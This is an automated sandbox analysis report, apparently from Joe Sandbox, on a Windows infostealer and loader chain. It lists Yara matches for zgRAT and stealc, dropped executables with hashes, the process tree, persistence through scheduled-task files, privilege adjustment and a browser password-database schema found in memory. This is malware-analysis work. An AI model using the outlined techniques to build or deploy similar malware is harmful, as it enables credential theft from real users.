Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E89576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 17_2_00E89576
Drops certificate files (DER)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Temp\Tmp1F00.tmp Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Temp\Tmp1F11.tmp Jump to dropped file

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\penis[1].exe, type: DROPPED Matched rule: Detects zgRAT Author: ditekSHen
.NET source code contains very large array initializations
Source: crypted[1].exe.27.dr, MoveAngles.cs Large array initialization: MoveAngles: array initializer size 311296
Source: crypted.exe.27.dr, MoveAngles.cs Large array initialization: MoveAngles: array initializer size 311296
Binary is likely a compiled AutoIt script file
Source: 6dbb7bdf47.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: 6dbb7bdf47.exe, 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_146723aa-9
Source: 6dbb7bdf47.exe, 00000011.00000002.3762938335.0000000000EB2000.00000002.00000001.01000000.0000000B.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_871ae693-8
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: skotes.exe.6.dr Static PE information: section name:
Source: skotes.exe.6.dr Static PE information: section name: .idata
Source: skotes.exe.6.dr Static PE information: section name:
Source: 3ec4738210.exe.11.dr Static PE information: section name:
Source: 3ec4738210.exe.11.dr Static PE information: section name: .rsrc
Source: 3ec4738210.exe.11.dr Static PE information: section name: .idata
Source: 3ec4738210.exe.11.dr Static PE information: section name:
Source: b74664dd7e.exe.11.dr Static PE information: section name:
Source: b74664dd7e.exe.11.dr Static PE information: section name: .rsrc
Source: b74664dd7e.exe.11.dr Static PE information: section name: .idata
Source: b74664dd7e.exe.11.dr Static PE information: section name:
Source: random[1].exe0.11.dr Static PE information: section name:
Source: random[1].exe0.11.dr Static PE information: section name: .idata
Source: random[1].exe0.11.dr Static PE information: section name:
Source: random[1].exe1.11.dr Static PE information: section name:
Source: random[1].exe1.11.dr Static PE information: section name: .rsrc
Source: random[1].exe1.11.dr Static PE information: section name: .idata
Source: random[1].exe1.11.dr Static PE information: section name:
Source: 610cd559ac.exe.11.dr Static PE information: section name:
Source: 610cd559ac.exe.11.dr Static PE information: section name: .idata
Source: 610cd559ac.exe.11.dr Static PE information: section name:
Source: axplong.exe.23.dr Static PE information: section name:
Source: axplong.exe.23.dr Static PE information: section name: .idata
Source: axplong.exe.23.dr Static PE information: section name:
Source: random[2].exe.27.dr Static PE information: section name:
Source: random[2].exe.27.dr Static PE information: section name: .rsrc
Source: random[2].exe.27.dr Static PE information: section name: .idata
Source: random[2].exe.27.dr Static PE information: section name:
Source: 4d72d15151.exe.27.dr Static PE information: section name:
Source: 4d72d15151.exe.27.dr Static PE information: section name: .rsrc
Source: 4d72d15151.exe.27.dr Static PE information: section name: .idata
Source: 4d72d15151.exe.27.dr Static PE information: section name:
PE file has a writeable .text section
Source: stealc_default2[1].exe.27.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: stealc_default2.exe.27.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Contains functionality to communicate with device drivers
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E5D5EB: CreateFileW,DeviceIoControl,CloseHandle, 17_2_00E5D5EB
Contains functionality to launch a process as a different user
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E51201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 17_2_00E51201
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E5E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 17_2_00E5E8F6
Creates files inside the system directory
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe File created: C:\Windows\Tasks\axplong.job
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00DBE530 11_2_00DBE530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00DF78BB 11_2_00DF78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00DF7049 11_2_00DF7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00DF8860 11_2_00DF8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00DB4DE0 11_2_00DB4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00DF31A8 11_2_00DF31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00DF2D10 11_2_00DF2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00DF779B 11_2_00DF779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00DE7F36 11_2_00DE7F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00DB4B30 11_2_00DB4B30
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00DFBF40 17_2_00DFBF40
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E62046 17_2_00E62046
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00DF8060 17_2_00DF8060
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E58298 17_2_00E58298
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E2E4FF 17_2_00E2E4FF
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E2676B 17_2_00E2676B
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E84873 17_2_00E84873
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00DFCAF0 17_2_00DFCAF0
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E1CAA0 17_2_00E1CAA0
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E0CC39 17_2_00E0CC39
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E26DD9 17_2_00E26DD9
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00DF91C0 17_2_00DF91C0
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E0B119 17_2_00E0B119
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E11394 17_2_00E11394
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E11706 17_2_00E11706
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E1781B 17_2_00E1781B
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E119B0 17_2_00E119B0
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E0997D 17_2_00E0997D
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00DF7920 17_2_00DF7920
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E17A4A 17_2_00E17A4A
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E17CA7 17_2_00E17CA7
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E11C77 17_2_00E11C77
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E29EEE 17_2_00E29EEE
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E7BE44 17_2_00E7BE44
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E11F32 17_2_00E11F32
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\acentric[1].exe 1ED4A8B4C74AAB435EA5CD459D5AC961E5A8CA28924801BD84D336135F30EFDE
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\crypted[1].exe 17AC37B4946539FA7FA68B12BD80946D340497A7971802B5848830AD99EA1E10
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: String function: 00DF9CB3 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: String function: 00E0F9F2 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: String function: 00E10A30 appears 46 times
One or more processes crash
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7672 -s 1512
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\penis[1].exe, type: DROPPED Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: crypted[1].exe.27.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: crypted.exe.27.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: file.exe Static PE information: Section: ZLIB complexity 0.998073484332425
Source: file.exe Static PE information: Section: nkxohnek ZLIB complexity 0.9944936410956882
Source: skotes.exe.6.dr Static PE information: Section: ZLIB complexity 0.998073484332425
Source: skotes.exe.6.dr Static PE information: Section: nkxohnek ZLIB complexity 0.9944936410956882
Source: 3ec4738210.exe.11.dr Static PE information: Section: fcorzhao ZLIB complexity 0.9947172108493443
Source: b74664dd7e.exe.11.dr Static PE information: Section: fcorzhao ZLIB complexity 0.9947172108493443
Source: random[1].exe0.11.dr Static PE information: Section: ZLIB complexity 0.9973124574250681
Source: random[1].exe0.11.dr Static PE information: Section: qnrefdmv ZLIB complexity 0.9946357918838136
Source: random[1].exe1.11.dr Static PE information: Section: fcorzhao ZLIB complexity 0.9947172108493443
Source: 610cd559ac.exe.11.dr Static PE information: Section: ZLIB complexity 0.9973124574250681
Source: 610cd559ac.exe.11.dr Static PE information: Section: qnrefdmv ZLIB complexity 0.9946357918838136
Source: axplong.exe.23.dr Static PE information: Section: ZLIB complexity 0.9973124574250681
Source: axplong.exe.23.dr Static PE information: Section: qnrefdmv ZLIB complexity 0.9946357918838136
Source: random[2].exe.27.dr Static PE information: Section: fcorzhao ZLIB complexity 0.9947172108493443
Source: 4d72d15151.exe.27.dr Static PE information: Section: fcorzhao ZLIB complexity 0.9947172108493443
Source: skotes.exe.6.dr Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: file.exe Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@39/57@1/12
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E637B5 GetLastError,FormatMessageW, 17_2_00E637B5
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E510BF AdjustTokenPrivileges,CloseHandle, 17_2_00E510BF
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E516C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 17_2_00E516C3
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E651CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 17_2_00E651CD
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E7A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 17_2_00E7A67C
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00E6648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize, 17_2_00E6648E
Source: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe Code function: 17_2_00DF42A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 17_2_00DF42A2
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\random[1].exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7672
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8028:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1964
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7812
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user~1\AppData\Local\Temp\abc3bc1985 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: RegAsm.exe, 00000021.00000002.2744975325.000000000382E000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003854000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000021.00000002.2744975325.0000000003845000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe ReversingLabs: Detection: 47%
Source: file.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 3ec4738210.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: b74664dd7e.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 3ec4738210.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\file.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe "C:\Users\user~1\AppData\Local\Temp\1000002001\3ec4738210.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\1000015002\b74664dd7e.exe "C:\Users\user\1000015002\b74664dd7e.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe "C:\Users\user~1\AppData\Local\Temp\1000002001\3ec4738210.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe "C:\Users\user~1\AppData\Local\Temp\1000019101\6dbb7bdf47.exe"
Source: unknown Process created: C:\Users\user\1000015002\b74664dd7e.exe "C:\Users\user\1000015002\b74664dd7e.exe"
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7672 -s 1512
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe "C:\Users\user~1\AppData\Local\Temp\1000020001\610cd559ac.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe "C:\Users\user~1\AppData\Local\Temp\1000002001\3ec4738210.exe"
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe
Source: unknown Process created: C:\Users\user\1000015002\b74664dd7e.exe "C:\Users\user\1000015002\b74664dd7e.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe "C:\Users\user~1\AppData\Local\Temp\1000002001\gold.exe"
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 1500
Source: C:\Users\user\1000015002\b74664dd7e.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7812 -s 1512
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe "C:\Users\user~1\AppData\Local\Temp\1000002001\3ec4738210.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\1000015002\b74664dd7e.exe "C:\Users\user\1000015002\b74664dd7e.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe "C:\Users\user~1\AppData\Local\Temp\1000019101\6dbb7bdf47.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe "C:\Users\user~1\AppData\Local\Temp\1000020001\610cd559ac.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe "C:\Users\user~1\AppData\Local\Temp\1000002001\gold.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe "C:\Users\user~1\AppData\Local\Temp\1000002001\gold.exe"
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 1500
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000002001\gold.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
